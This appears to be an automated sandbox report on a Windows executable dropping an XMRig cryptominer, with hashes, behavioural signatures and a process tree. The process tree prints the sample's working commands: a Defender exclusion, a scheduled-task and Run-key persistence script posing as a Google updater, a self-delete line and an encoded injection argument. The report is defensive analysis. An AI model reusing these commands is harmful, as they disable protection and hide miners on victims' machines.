Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
1801s -
max time network
1790s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
23-01-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231129-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
Processes:
6vHkJ4UErTSS5ECD.exeupdater.execonhost.exedescription pid process target process PID 2528 created 1204 2528 6vHkJ4UErTSS5ECD.exe Explorer.EXE PID 2528 created 1204 2528 6vHkJ4UErTSS5ECD.exe Explorer.EXE PID 2528 created 1204 2528 6vHkJ4UErTSS5ECD.exe Explorer.EXE PID 2528 created 1204 2528 6vHkJ4UErTSS5ECD.exe Explorer.EXE PID 2800 created 1204 2800 updater.exe Explorer.EXE PID 2800 created 1204 2800 updater.exe Explorer.EXE PID 2800 created 1204 2800 updater.exe Explorer.EXE PID 2800 created 1204 2800 updater.exe Explorer.EXE PID 2896 created 1204 2896 conhost.exe Explorer.EXE PID 2800 created 1204 2800 updater.exe Explorer.EXE -
XMRig Miner payload 30 IoCs
Processes:
resource yara_rule behavioral5/memory/2072-71-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-73-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-75-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-76-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-78-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-90-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-92-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-94-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-96-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-98-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-100-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-102-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-104-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-111-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-113-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-115-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-117-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-119-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-121-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-123-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-125-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-127-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-129-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-131-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-133-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral5/memory/2072-135-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2580 cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 2800 updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 828 taskeng.exe -
Processes:
resource yara_rule behavioral5/memory/2072-67-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-71-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-73-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-75-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-76-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-78-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-90-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-92-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-94-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-96-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-98-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-100-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-102-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-104-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-111-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-113-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-115-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-117-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-119-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-121-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-123-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-125-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-127-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-129-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-131-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-133-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral5/memory/2072-135-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 2800 set thread context of 2896 2800 updater.exe conhost.exe PID 2800 set thread context of 2072 2800 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
updater.execmd.execmd.exe6vHkJ4UErTSS5ECD.exedescription ioc process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe 6vHkJ4UErTSS5ECD.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3000 schtasks.exe 1972 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10b7378cb74fda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
6vHkJ4UErTSS5ECD.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.execonhost.exepid process 2528 6vHkJ4UErTSS5ECD.exe 2528 6vHkJ4UErTSS5ECD.exe 2420 powershell.exe 2528 6vHkJ4UErTSS5ECD.exe 2528 6vHkJ4UErTSS5ECD.exe 2716 powershell.exe 2528 6vHkJ4UErTSS5ECD.exe 2528 6vHkJ4UErTSS5ECD.exe 2528 6vHkJ4UErTSS5ECD.exe 2528 6vHkJ4UErTSS5ECD.exe 2696 powershell.exe 2800 updater.exe 2800 updater.exe 2008 powershell.exe 2800 updater.exe 2800 updater.exe 2168 powershell.exe 2800 updater.exe 2800 updater.exe 2800 updater.exe 2800 updater.exe 2896 conhost.exe 2896 conhost.exe 2800 updater.exe 2800 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 31 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeupdater.exeWMIC.execonhost.exedescription pid process Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 2800 updater.exe Token: SeAssignPrimaryTokenPrivilege 652 WMIC.exe Token: SeIncreaseQuotaPrivilege 652 WMIC.exe Token: SeSecurityPrivilege 652 WMIC.exe Token: SeTakeOwnershipPrivilege 652 WMIC.exe Token: SeLoadDriverPrivilege 652 WMIC.exe Token: SeSystemtimePrivilege 652 WMIC.exe Token: SeBackupPrivilege 652 WMIC.exe Token: SeRestorePrivilege 652 WMIC.exe Token: SeShutdownPrivilege 652 WMIC.exe Token: SeSystemEnvironmentPrivilege 652 WMIC.exe Token: SeUndockPrivilege 652 WMIC.exe Token: SeManageVolumePrivilege 652 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 652 WMIC.exe Token: SeIncreaseQuotaPrivilege 652 WMIC.exe Token: SeSecurityPrivilege 652 WMIC.exe Token: SeTakeOwnershipPrivilege 652 WMIC.exe Token: SeLoadDriverPrivilege 652 WMIC.exe Token: SeSystemtimePrivilege 652 WMIC.exe Token: SeBackupPrivilege 652 WMIC.exe Token: SeRestorePrivilege 652 WMIC.exe Token: SeShutdownPrivilege 652 WMIC.exe Token: SeSystemEnvironmentPrivilege 652 WMIC.exe Token: SeUndockPrivilege 652 WMIC.exe Token: SeManageVolumePrivilege 652 WMIC.exe Token: SeLockMemoryPrivilege 2072 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
powershell.execmd.exepowershell.exetaskeng.exepowershell.exeupdater.execmd.exedescription pid process target process PID 2716 wrote to memory of 3000 2716 powershell.exe schtasks.exe PID 2716 wrote to memory of 3000 2716 powershell.exe schtasks.exe PID 2716 wrote to memory of 3000 2716 powershell.exe schtasks.exe PID 2580 wrote to memory of 2656 2580 cmd.exe choice.exe PID 2580 wrote to memory of 2656 2580 cmd.exe choice.exe PID 2580 wrote to memory of 2656 2580 cmd.exe choice.exe PID 2696 wrote to memory of 2564 2696 powershell.exe schtasks.exe PID 2696 wrote to memory of 2564 2696 powershell.exe schtasks.exe PID 2696 wrote to memory of 2564 2696 powershell.exe schtasks.exe PID 828 wrote to memory of 2800 828 taskeng.exe updater.exe PID 828 wrote to memory of 2800 828 taskeng.exe updater.exe PID 828 wrote to memory of 2800 828 taskeng.exe updater.exe PID 2168 wrote to memory of 1972 2168 powershell.exe schtasks.exe PID 2168 wrote to memory of 1972 2168 powershell.exe schtasks.exe PID 2168 wrote to memory of 1972 2168 powershell.exe schtasks.exe PID 2800 wrote to memory of 2896 2800 updater.exe conhost.exe PID 772 wrote to memory of 652 772 cmd.exe WMIC.exe PID 772 wrote to memory of 652 772 cmd.exe WMIC.exe PID 772 wrote to memory of 652 772 cmd.exe WMIC.exe PID 2800 wrote to memory of 2072 2800 updater.exe conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1204
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:3000 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6vHkJ4UErTSS5ECD.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:2564
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1972 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1016 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:652 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2896 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2656
-
C:\Windows\system32\taskeng.exetaskeng.exe {9B3C98EF-D47E-40BB-B464-56F092CDBE2A} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
45KB
MD5e6d383a88e9ffe3d919af82e1a0cfdb1
SHA155c5078350fcdedc2ba39ca2df1ca779921a57e3
SHA2564d07ed5f82cf67c9aa2c3f5d0fe8309eb122874edb09086e709d1394b227367e
SHA512db3e2009454c58792dbee8cfb91657569e23429b2534fe5e902295348ec2a8debccdd490e56826dd071ca9df186593f82381561f47f08cdffa2b829a28fda436
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5dc8d67081ca71bcf29dd8d77839c6ed7
SHA1543943a564ed128661d7ca20008522fe2454f89a
SHA256515bc2644ecfd5d35721873193ef4c2383c6b8a595e46389d986426c48d333f3
SHA5120010759844d5353add204cee8287b8dc6924e177bc4f89c1332991b387d4e0fd0690ca3698acf5cfb9e7468eecdb6a70195d5ecc38fce00b86a8c1cb9ff112ec
-
Filesize
64KB
MD51b1610f1b926243ccc03f7172ce3bebe
SHA1595d679f04129f548feb024aa9070d99e88da0d5
SHA25693528004be8c6008a78c38435f9a52ec32c9fcc8f872c3807fde72889ad08d70
SHA512ae5ab1ffb54e41365cedb3ce6e2fde26ffdc9b5656b98f883e0ba5588e625ba1fc40e5f274bea1f989d68e74f1f92373231efafa508311100c87f58345aae9a4